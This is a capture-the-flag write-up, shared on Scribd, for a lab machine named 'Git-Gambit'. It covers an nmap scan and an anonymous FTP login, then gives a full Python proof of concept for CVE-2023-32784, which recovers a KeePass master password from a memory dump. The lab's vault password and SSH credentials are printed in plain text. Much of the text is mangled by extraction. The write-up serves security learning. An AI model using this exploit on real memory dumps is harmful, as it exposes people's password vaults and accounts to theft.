Scribd
Upload
38 views11 pages

NMAP Recon and CVE-2023-32784 Analysis

The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

Uploaded by

mrgods.home
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
38 views11 pages

NMAP Recon and CVE-2023-32784 Analysis

The document discusses using Nmap to scan ports on a target IP address, anonymous FTP login to download files, finding credentials in a memory dump file, and using Keepass to open an encrypted vault file containing SSH credentials to access the system and retrieve a user flag.

Uploaded by

mrgods.home
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Git-Gambit

Recon
Lets Start With NMAP

sudo nmap -sCV [Link] -p-

Anonymous Login Allowed FTP

ftp anonymous@[Link] -p 5555


Download Both

When i Unzipped ,
When googling found this ,

import argparse
import logging
import itertools

class TaggedFormatter([Link]):

TAGS = {
'DEBUG': '\x1b[1;35m#\x1b[0m',
'INFO': '\x1b[1;34m.\x1b[0m',
'WARNING': '\x1b[1;33m-\x1b[0m',
'ERROR': '\x1b[1;31m!\x1b[0m',
'CRITICAL': '\x1b[1;31m!!\x1b[0m'
}

def __init__(self, format):


[Link].__init__(self,
format)

def format(self, record):


levelname = [Link]

if levelname in [Link]:
[Link] =
[Link][levelname]

return
[Link](self, record)

def setup_logging(debug = False):


formatter = TaggedFormatter('%
(asctime)s [%(levelname)s] [%(name)s] %
(message)s')
handler = [Link]()
root_logger = [Link]()

[Link](formatter)
root_logger.addHandler(handler)

if debug:

root_logger.setLevel([Link])
else:
root_logger.setLevel([Link])

def parse_args():
parser =
[Link](description='CVE-
2023-32784 proof-of-concept')

parser.add_argument('dump', type=str,
help='The path of the memory dump to
analyze')
parser.add_argument('-d', '--debug',
dest='debug', action='store_true',
help='Enable debugging mode')

return parser.parse_args()

def get_candidates(dump_file):
data = dump_file.read()
candidates = []
str_len = 0
i = 0

while i < len(data)-1:


if (data[i] == 0xCF) and (data[i +
1] == 0x25):
str_len += 1
i += 1
elif str_len > 0:
if (data[i] >= 0x20) and
(data[i] <= 0x7E) and (data[i + 1] ==
0x00):
candidate = (str_len *
b'\xCF\x25') + bytes([data[i], data[i +
1]])

if not candidate in
candidates:

[Link](candidate)

str_len = 0

i += 1

return candidates

if __name__ == '__main__':
args = parse_args()
setup_logging([Link])
logger = [Link]('main')
with open([Link], 'rb') as
dump_file:
[Link](f'Opened
{dump_file.name}')

candidates =
get_candidates(dump_file)
candidates = [[Link]('utf-16-
le') for x in candidates]
groups = [[] for i in
range(max([len(i) for i in candidates]))]

for candidate in candidates:


groups[len(candidate) -
1].append(candidate[-1])

for i in range(len(groups)):
if len(groups[i]) == 0:

groups[i].append(b'\xCF\x25'.decode('utf-
16-le'))
for password in
[Link](*groups):
password = ''.join(password)
print(f'Possible password:
{password}')

Password : strongpassherehello

Install keepass in windows to open [Link]


There i found , user

john : YvbseSFRp2Ed4DCjTucNKB

Yes it is SSH creds , Logged in


Got [Link] !

You might also like